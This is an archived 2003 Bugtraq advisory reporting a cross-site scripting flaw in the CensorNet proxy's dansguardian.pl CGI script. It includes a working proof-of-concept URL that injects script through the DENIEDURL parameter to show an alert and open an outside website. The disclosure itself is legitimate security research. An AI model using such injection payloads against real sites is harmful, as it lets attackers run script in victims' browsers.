[32138] in bugtraq
CensorNet: Cross Site Scripting Vulnerability
daemon@ATHENA.MIT.EDU (Richard Maudsley)
Thu Oct 23 13:14:12 2003
Message-id: <fc.00802e600020bf4c00802e600020bf4c.20c0f8@rbwm.org>
Date: Wed, 22 Oct 2003 12:51:13 +0100
To: bugtraq@securityfocus.com, support@adelix.com, wrigd006@rbwm.org,
frenw001@rbwm.org
From: "Richard Maudsley" <maudr001@rbwm.org>
MIME-Version: 1.0
Content-type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
Hello,
A cross site scripting vulnerability exists in the CensorNet Proxy Service
(www.censornet.com) that allows scripting (and html) to be passed to the
cgi script and displayed in the web browser.
Exploit:
http://SERVER/cgi-bin/dansguardian.pl?DENIEDURL=</a><script>alert('Counter-Strike__servers__from__£10_per_month!');window.open("http://www.socketx.co.uk")</script>
Regards,
Richard Maudsley
- -------------------------------------------------------------------
This email has been sent from the Royal Borough of Windsor and Maidenhead LEA system, if you have cause for complaint regarding the
content of this email please contact abuse@rbwm.org
- -------------------------------------------------------------------
